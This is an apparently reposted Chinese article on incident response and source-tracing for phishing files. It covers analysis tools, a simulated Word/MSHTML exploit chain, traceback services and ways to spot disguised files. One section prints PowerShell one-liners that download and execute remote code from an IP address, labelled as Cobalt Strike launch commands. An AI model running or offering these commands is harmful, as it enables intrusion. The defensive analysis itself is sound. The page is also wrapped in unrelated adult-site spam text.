成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

釣魚文件應(yīng)急溯源:方法篇

安全 應(yīng)用安全
用戶帳戶控制 (UAC) 有助于防止惡意軟件損壞電腦,并且有助于組織部署易于管理的桌面。 借助 UAC,應(yīng)用和任務(wù)將始終在非管理員帳戶的安全上下文中運(yùn)行,除非管理員專門授予管理員級(jí)別的訪問系統(tǒng)權(quán)限。 UAC 可阻止自動(dòng)安裝未經(jīng)授權(quán)的應(yīng)用并防止意外更改系統(tǒng)設(shè)置。

內(nèi)容概覽

wKg0C2UCozqAAY4AABsxd19Dmk459.pngwKg0C2UCozqAAY4AABsxd19Dmk459.png

背景

惡意軟件分析技術(shù)的市場(chǎng)

如今,惡意軟件分析已是信息安全領(lǐng)域的一個(gè)整體產(chǎn)業(yè):

發(fā)布保護(hù)產(chǎn)品的反病毒引擎實(shí)驗(yàn)室,高度專業(yè)化的專家小組,甚至惡意軟件編寫者本身也參與其中,他們爭(zhēng)奪一個(gè)潛在的客戶--"受害者"。

常見的分析技術(shù)

  • 靜態(tài)惡意軟件分析

靜態(tài)惡意軟件分析在不主動(dòng)運(yùn)行惡意軟件代碼的情況下查找可能損害系統(tǒng)的文件,使其成為暴露惡意庫或打包文件的安全工具。靜態(tài)惡意軟件分析可以發(fā)現(xiàn)有關(guān)惡意軟件性質(zhì)的線索,例如文件名、哈希、IP 地址、域和文件頭數(shù)據(jù)。可以使用各種工具(例如網(wǎng)絡(luò)分析器)觀察惡意軟件。

  • 動(dòng)態(tài)惡意軟件分析

動(dòng)態(tài)惡意軟件分析使用沙盒,沙盒是一個(gè)安全、隔離的虛擬環(huán)境,您可以在其中運(yùn)行可疑的危險(xiǎn)代碼。安全專業(yè)人員可以密切監(jiān)視沙箱中的惡意軟件,而不必?fù)?dān)心感染系統(tǒng)或網(wǎng)絡(luò)的其余部分,從而使他們能夠收集有關(guān)惡意軟件的更多信息。

  • 混合惡意軟件分析

混合惡意軟件分析結(jié)合了靜態(tài)和動(dòng)態(tài)技術(shù)。例如,如果惡意代碼對(duì)計(jì)算機(jī)的內(nèi)存進(jìn)行更改,則動(dòng)態(tài)分析可以檢測(cè)到該活動(dòng)。然后,靜態(tài)分析可以準(zhǔn)確確定進(jìn)行了哪些更改。

常見的檢測(cè)工具展示

網(wǎng)絡(luò)分析工具

  • NetLimiter

官網(wǎng):https://www.netlimiter.com/

可通過此工具監(jiān)測(cè)程序的網(wǎng)絡(luò)通訊信息,以方便進(jìn)一步分析

  • CurrPorts

官網(wǎng):https://www.nirsoft.net/utils/cports.html

可通過此工具顯示本地計(jì)算機(jī)上所有當(dāng)前打開的TCP/IP和UDP端口的列表。對(duì)于列表中的每個(gè)端口,還顯示打開該端口的進(jìn)程的信息,包括進(jìn)程名稱、進(jìn)程的完整路徑、進(jìn)程的版本信息(產(chǎn)品名稱、文件描述等)、進(jìn)程的創(chuàng)建時(shí)間以及創(chuàng)建該進(jìn)程的用戶。此外,CurrPorts允許你關(guān)閉不需要的TCP連接,殺死打開端口的進(jìn)程,并將TCP/UDP端口信息保存到HTML文件、XML文件或以制表符分隔的文本文件中。

  • TeaPot

可通過此工具監(jiān)測(cè)目標(biāo)系統(tǒng)的DNS解析,可有效應(yīng)用于對(duì)APT遠(yuǎn)控木馬的檢測(cè)。

  • HTTPDebuger

官網(wǎng):https://www.httpdebugger.com/

可通過此攻擊http與https數(shù)據(jù)

行為監(jiān)控工具

  • DiffView

官網(wǎng):https://www.adlice.com/diffview/

可通過此工具追蹤一個(gè)程序在你系統(tǒng)上所做的修改或一些操作進(jìn)行監(jiān)控

  • 火絨劍

官網(wǎng):https://www.huorong.cn/

可通過此工具在如下圖所展示的角度分析程序運(yùn)行后做了什么,以分析是否為惡意程序以及進(jìn)行輔助分析工作

  • Comodo

可通過此工具的HIPS與防火墻功能監(jiān)測(cè)程序運(yùn)行后做了什么,以進(jìn)行分析

https://www.comodo.com/home/internet-security/free-internet-security.php

反編譯與調(diào)試工具

  • GDA 與Frida

http://www.gda.wiki:9090/

https://frida.re/

通過GDA與Frida來分析APK是否存在惡意行為

  • x64dbg

https://x64dbg.com/

可通過此工具深入分析程序的執(zhí)行情況以及運(yùn)行原理

知識(shí)擴(kuò)展

思路

一個(gè)惡意軟件分析思路圖展示,如下圖展示了三個(gè)編碼級(jí)別

惡意軟件作者:使用高級(jí)語言編寫惡意程序

計(jì)算機(jī):CPU識(shí)別代碼進(jìn)行執(zhí)行

惡意軟件分析人員:通過反編譯手段進(jìn)行分析

發(fā)包函數(shù)

針對(duì)軟件的網(wǎng)絡(luò)信息常針對(duì)底層運(yùn)行原理,通過攔截發(fā)布函數(shù)進(jìn)行分析

WSPSend函數(shù)在一個(gè)連接的套接字上發(fā)送數(shù)據(jù)。

WSPSendTo函數(shù)使用重疊的I/O將數(shù)據(jù)發(fā)送到一個(gè)特定的目的地。

WSPRecv函數(shù)在一個(gè)套接字上接收數(shù)據(jù)。

WSPRecvFrom函數(shù)接收一個(gè)數(shù)據(jù)報(bào)并存儲(chǔ)源地址。

漏洞利用類釣魚

模擬

打開Word 發(fā)現(xiàn)有下載連接

模擬惡意行為打開了計(jì)算器

真實(shí)背景利用案例

該漏洞存在于MSHTML,即Internet Explorer的引擎。雖然現(xiàn)在很少有人使用IE(甚至微軟也強(qiáng)烈建議改用其較新的瀏覽器Edge),但這個(gè)舊的瀏覽器仍然是現(xiàn)代操作系統(tǒng)的一個(gè)組成部分,而且其他一些程序也使用其引擎來處理網(wǎng)絡(luò)內(nèi)容。特別是,微軟的Office應(yīng)用程序,如Word和PowerPoint,都依賴它。

釣魚郵件示例

自該漏洞發(fā)布以來,安全研究人員在Twitter上警告說,盡管微軟Office的 “保護(hù)視圖 ”功能會(huì)阻止該漏洞,但這是多么危險(xiǎn)。當(dāng)Office打開一個(gè)文檔時(shí),它會(huì)檢查它是否被標(biāo)記為 “網(wǎng)絡(luò)標(biāo)記”(MoTW),這意味著它來自于互聯(lián)網(wǎng)。如果這個(gè)標(biāo)簽存在,微軟將以只讀模式打開文檔,有效地阻止了該漏洞,除非用戶點(diǎn)擊 “啟用編輯 ”按鈕。

但歷史表明,許多用戶忽略了這一警告,還是點(diǎn)擊了 "啟用編輯 "按鈕。

但還有有許多方法可以使文件不收到MoTW標(biāo)志,從而有效地否定了這種防御。

模擬分析

  • 網(wǎng)絡(luò)分析示例

發(fā)起程序-

WINWORD.EXE *64位
請(qǐng)求地址-

http://192.168.86.144/http://192.168.86.144/word.cab

解析:cab是windows的壓縮格式

wKg0C2UCpBOAAnAACszVAwzY204.pngwKg0C2UCpBOAAnAACszVAwzY204.png

  • 行為監(jiān)控分析示例

正常:就是打開一個(gè)word文檔

可疑:調(diào)用了控制面板程序control.exe

并通過控制面板執(zhí)行臨時(shí)文件夾下名為msword.inf配置文件,之后通過運(yùn)行cmd程序打開計(jì)算器程序calc.exe(這里代指惡意程序)

wKg0C2UCpBqAX0yYAACy0bR8oQU988.pngwKg0C2UCpBqAX0yYAACy0bR8oQU988.png

  • 解包查看

wKg0C2UCpCWASqn1AADlwxzrz2w111.pngwKg0C2UCpCWASqn1AADlwxzrz2w111.png

wKg0C2UCpCuAPWqDAAEhQTbZ1Gg436.pngwKg0C2UCpCuAPWqDAAEhQTbZ1Gg436.png

結(jié)合之前網(wǎng)絡(luò)分析訪問此地址后跳轉(zhuǎn)下載可疑文件

  • 下載分析

wKg0C2UCpDOAaFCoAABuP491kv4431.pngwKg0C2UCpDOAaFCoAABuP491kv4431.png

wKg0C2UCpECARy4iAABGHprY5UY440.pngwKg0C2UCpECARy4iAABGHprY5UY440.png

通過control(控制面板)程序運(yùn)行msword.inf腳本

INF文件中包含硬件設(shè)備的信息或腳本以控制硬件操作。

  • 解析

wKg0C2UCpEiAH5afAABMcu2mAl4626.pngwKg0C2UCpEiAH5afAABMcu2mAl4626.png

看到了計(jì)算器相關(guān)內(nèi)容(calc.exe 這里代指惡意程序)

  • 反匯編定位

wKg0C2UCpEAAYfZAADRWQyZQn0617.pngwKg0C2UCpEAAYfZAADRWQyZQn0617.png

關(guān)鍵函數(shù)運(yùn)行完畢,惡意程序已成功加載

wKg0C2UCpFaAawSxAACxyeLetA860.pngwKg0C2UCpFaAawSxAACxyeLetA860.png

進(jìn)入查看(已加載惡意配置文件)

wKg0C2UCpF2AY0TuAADg88tJ1w099.pngwKg0C2UCpF2AY0TuAADg88tJ1w099.png

ShellExecuteExW函數(shù)(可通常此函數(shù)執(zhí)行外部程序或打開文件)

wKg0C2UCpGWAeYGvAADAxenDwq8165.pngwKg0C2UCpGWAeYGvAADAxenDwq8165.png

rundll32.exe(rundll32.exe用于在內(nèi)存中運(yùn)行DLL文件,

它們會(huì)在應(yīng)用程序中被使用,可用于在內(nèi)存中執(zhí)行惡意dll)

wKg0C2UCpGuACTvAACiY3WsNCM021.pngwKg0C2UCpGuACTvAACiY3WsNCM021.png

棧回溯

執(zhí)行參數(shù)

溯源

常根據(jù)分析的數(shù)據(jù)如IP、MD5、簽名等等通過一些方法深入定位制作者

常用的一些工具

  • 埃文

https://www.ipplus360.com/

可通過此工具進(jìn)行IP定位

  • BestTrace

https://www.ipip.net/product/client.html

IP歸屬快速查詢

  • 備案、Whois、威脅情報(bào)查詢系統(tǒng)

https://beian.miit.gov.cn/#/Integrated/index

https://whois.aliyun.com/

https://ti.qianxin.com/

https://s.threatbook.com/

https://tix.qq.com/

https://ti.sangfor.com.cn/analysis-platform

判斷

  • 后綴名與顯示的logo

wKg0C2UCpHiAWZOaAACBAeosvbI241.pngwKg0C2UCpHiAWZOaAACBAeosvbI241.png

如圖所示顯示的是常見pdf logo但實(shí)際是可執(zhí)行文件

  • 文件類型

wKg0C2UCpIGAN4kcAACGGuKnsek601.pngwKg0C2UCpIGAN4kcAACGGuKnsek601.png

如圖所示,通過一些方法使其后綴名看起來正常,但實(shí)際是可執(zhí)行文件,此類可通過屬性文件類型信息查看

  • hash

例如,假設(shè)你有20個(gè)來源不明的文件,你能夠使用它們的MD5值在virscan、Virustotal之類的查殺網(wǎng)站進(jìn)行對(duì)比來識(shí)別它們的安全度

https://www.virscan.org/

https://www.virustotal.com/

wKg0C2UCpIqAFYfWAABQja2oo266.pngwKg0C2UCpIqAFYfWAABQja2oo266.png

wKg0C2UCpJKAYrQAAAvJEQZj4g394.pngwKg0C2UCpJKAYrQAAAvJEQZj4g394.png

  • 時(shí)間戳

wKg0C2UCpJqAH7wQAABe5Jyll6Q722.pngwKg0C2UCpJqAH7wQAABe5Jyll6Q722.png

wKg0C2UCpKOAOMTlAABQ0RzElgM913.pngwKg0C2UCpKOAOMTlAABQ0RzElgM913.png

如圖所示 編譯日期與版本信息差別過大

  • 郵件信息

wKg0C2UCpK6AJX7wAACHhXSeUxI677.pngwKg0C2UCpK6AJX7wAACHhXSeUxI677.png

發(fā)件人與所屬單位對(duì)比

  • 打開判斷

wKg0C2UCpLWAH5ejAADQKzvyBg460.pngwKg0C2UCpLWAH5ejAADQKzvyBg460.png

執(zhí)行惡意宏代碼,在TEMP目錄釋放XLS文件

然后通過WMIC啟動(dòng)惡意XLS文件

  • 專業(yè)工具

https://github.com/emalderson/ThePhish

釣魚郵件分析系統(tǒng)

wKg0C2UCpLyAfUSSAACr2DUczPk018.pngwKg0C2UCpLyAfUSSAACr2DUczPk018.png

  • 掃描

http://www.starwoodd.net/

wKg0C2UCpMOAWZ2bAACT9MJBhMw582.pngwKg0C2UCpMOAWZ2bAACT9MJBhMw582.png

  • 代碼分析

wKg0C2UCpMmAXBB9AAB5hy3fik762.pngwKg0C2UCpMmAXBB9AAB5hy3fik762.png

分析其具體行為與作用對(duì)比

  • 快捷方式

wKg0C2UCpNKAfoMSAABT0BDfiU740.pngwKg0C2UCpNKAfoMSAABT0BDfiU740.png

wKg0C2UCpNqAJN9zAAAsbfMTY8861.pngwKg0C2UCpNqAJN9zAAAsbfMTY8861.png

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://120.48.85.228/favicon’))”

常見的cs上線命令

wKg0C2UHQaATkUmAABj7lFl9QM176.jpgwKg0C2UHQaATkUmAABj7lFl9QM176.jpg

powershell.exe -nop -w hidden -c IEX (new-object net.webclient).downloadstring(‘’)

powershell上線命令可以簡(jiǎn)化,刪除了兩個(gè)括號(hào)和兩個(gè)雙引號(hào)

案例講解

  • 快捷方式

網(wǎng)上找的樣本進(jìn)行分析,如下圖所示,解包內(nèi)容存在欺騙誘導(dǎo)行為

wKg0C2UCpUOAai7RAADjtqMdF3k591.pngwKg0C2UCpUOAai7RAADjtqMdF3k591.png

wKg0C2UCpVWAQtePAADM51FXPVE648.pngwKg0C2UCpVWAQtePAADM51FXPVE648.png

  • 標(biāo)題誘導(dǎo)

查看屬性與解混混淆發(fā)現(xiàn)為惡意程序

wKg0C2UCpVuAGoHRAAErr9pPmwY177.pngwKg0C2UCpVuAGoHRAAErr9pPmwY177.png

wKg0C2UCpWmAWcoHAADHTYKABpE234.pngwKg0C2UCpWmAWcoHAADHTYKABpE234.png

wKg0C2UCpXSAfk7AACFYfU5sA637.pngwKg0C2UCpXSAfk7AACFYfU5sA637.png

  • 執(zhí)行監(jiān)控

打開文檔后發(fā)現(xiàn)有外聯(lián)與執(zhí)行程序行為

wKg0C2UCpXyAcCzkAAC8DGYjCUM619.pngwKg0C2UCpXyAcCzkAAC8DGYjCUM619.png

wKg0C2UCpYKACSR1AAC6gUvxvTs600.pngwKg0C2UCpYKACSR1AAC6gUvxvTs600.png

網(wǎng)上分析示例

  • 屬性查看

在PEstudio中檢查樣本的屬性,惡意軟件被打包,所有的字符串都被加密了

wKg0C2UCpYqAWs3eAADpknAlA8I598.pngwKg0C2UCpYqAWs3eAADpknAlA8I598.png

  • 反編譯逐步分析

wKg0C2UCpZGAVgV7AABfmtwT5EM947.pngwKg0C2UCpZGAVgV7AABfmtwT5EM947.png

獲取進(jìn)程的名稱,接著解密一些字符串,并將其中的兩個(gè)字符串連接起來創(chuàng)建 EXE 文件的名稱。

wKg0C2UCpaOAcMQfAACPV9S5YQ248.pngwKg0C2UCpaOAcMQfAACPV9S5YQ248.png

防止惡意程序自我感染的過程中,惡意軟件會(huì)將進(jìn)程的完整路徑與解析的應(yīng)用程序進(jìn)行比較。如果它們相同,惡意軟件將返回并結(jié)束此功能

wKg0C2UCpamAXtswAAB08gwZk591.pngwKg0C2UCpamAXtswAAB08gwZk591.png

遍歷信息

wKg0C2UCpaAfXCuAAE0hTbgpdA195.pngwKg0C2UCpaAfXCuAAE0hTbgpdA195.png

c2

wKg0C2UCpbeAZryyAADd358EcgY202.pngwKg0C2UCpbeAZryyAADd358EcgY202.png

內(nèi)容過多這里不展示了,下圖是總結(jié)與查殺規(guī)則

wKg0C2UCpb2AWEcAAAEnyMS6Do539.pngwKg0C2UCpb2AWEcAAAEnyMS6Do539.png

查殺

  • 掃描查殺思路圖

不同的環(huán)境不同的思路

wKg0C2UCpcWAHfZ6AACeMe8u8Y4701.pngwKg0C2UCpcWAHfZ6AACeMe8u8Y4701.png

  • 專業(yè)掃描工具

wKg0C2UCpcyAQQIhAACHbCkIhlw653.pngwKg0C2UCpcyAQQIhAACHbCkIhlw653.png

  • 弱點(diǎn)掃描

用戶帳戶控制 (UAC) 有助于防止惡意軟件損壞電腦,并且有助于組織部署易于管理的桌面。 借助 UAC,應(yīng)用和任務(wù)將始終在非管理員帳戶的安全上下文中運(yùn)行,除非管理員專門授予管理員級(jí)別的訪問系統(tǒng)權(quán)限。 UAC 可阻止自動(dòng)安裝未經(jīng)授權(quán)的應(yīng)用并防止意外更改系統(tǒng)設(shè)置。

wKg0C2UCpdAWLk9AACCKpAdzB0224.pngwKg0C2UCpdAWLk9AACCKpAdzB0224.png

總結(jié)

  • 對(duì)于文件

wKg0C2UCpeaAe3xJAACRsQ93HA179.pngwKg0C2UCpeaAe3xJAACRsQ93HA179.png

  • 內(nèi)存層防護(hù)與監(jiān)控

針對(duì)攻擊的多樣化建議在內(nèi)存層進(jìn)行防護(hù)與監(jiān)控,目前國內(nèi)安芯網(wǎng)盾這方面看到過相關(guān)資料

wKg0C2UCpe2AY40kAADWjv9EE30836.pngwKg0C2UCpe2AY40kAADWjv9EE30836.png

本文作者:SecIN技術(shù)社區(qū), 轉(zhuǎn)載請(qǐng)注明來自FreeBuf.COM


責(zé)任編輯:武曉燕 來源: 系統(tǒng)
相關(guān)推薦

2015-10-30 10:49:27

OpenStackIaaS

2020-04-17 10:53:38

釣魚郵件網(wǎng)絡(luò)攻擊冠狀病毒

2019-06-17 11:10:29

Linux工具應(yīng)急響應(yīng)

2019-05-21 14:33:01

2022-08-22 10:29:16

APT溯源反溯源APT攻擊

2019-03-26 08:52:51

2010-03-09 17:04:37

2010-03-09 16:53:58

2019-12-10 15:21:34

電腦硬件軟件

2015-07-29 15:21:43

數(shù)字水印數(shù)據(jù)泄露數(shù)據(jù)安全

2019-10-24 10:28:06

2021-03-10 10:05:59

網(wǎng)絡(luò)釣魚攻擊黑客

2010-09-03 13:55:25

2017-12-07 09:49:25

2021-10-03 15:50:06

網(wǎng)絡(luò)釣魚病毒黑客

2017-12-07 22:58:14

2017-09-14 15:55:20

2010-06-01 13:25:59

視頻會(huì)議高速公路捷思銳科技

2023-04-03 06:38:41

2019-12-06 09:16:23

Linux 開源操作系統(tǒng)
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)

主站蜘蛛池模板: 综合国产| 国产精品久久久久久久久免费桃花 | 欧美激情综合五月色丁香小说 | 99视频在线看 | 999久久久久久久久6666 | 中文一级片 | 视频一区中文字幕 | 午夜午夜精品一区二区三区文 | 欧美精品在线播放 | 鲁一鲁资源影视 | 91 在线| 免费看黄色小视频 | 欧美国产亚洲一区二区 | 北条麻妃一区二区三区在线视频 | 91一区| 精品视频在线一区 | 精精久久 | 国产一区二区三区在线 | 99tv成人影院 | 在线中文字幕亚洲 | 日韩第一区 | 一级黄色日本片 | 狠狠躁天天躁夜夜躁婷婷老牛影视 | 国产成人av一区二区三区 | 亚洲精品v日韩精品 | 欧美多人在线 | 欧美成年人网站 | 亚洲一区二区三区观看 | 中文字幕在线观看第一页 | 国产精品99久 | 亚洲黄色在线免费观看 | 国产精品18hdxxxⅹ在线 | 国产精品一区二区日韩 | 亚洲精品久久嫩草网站秘色 | 亚洲 精品 综合 精品 自拍 | 人妖videosex高潮另类 | 精品1区2区 | 福利社午夜影院 | 美女黄网 | 久久国产精品视频观看 | 国产高清久久久 |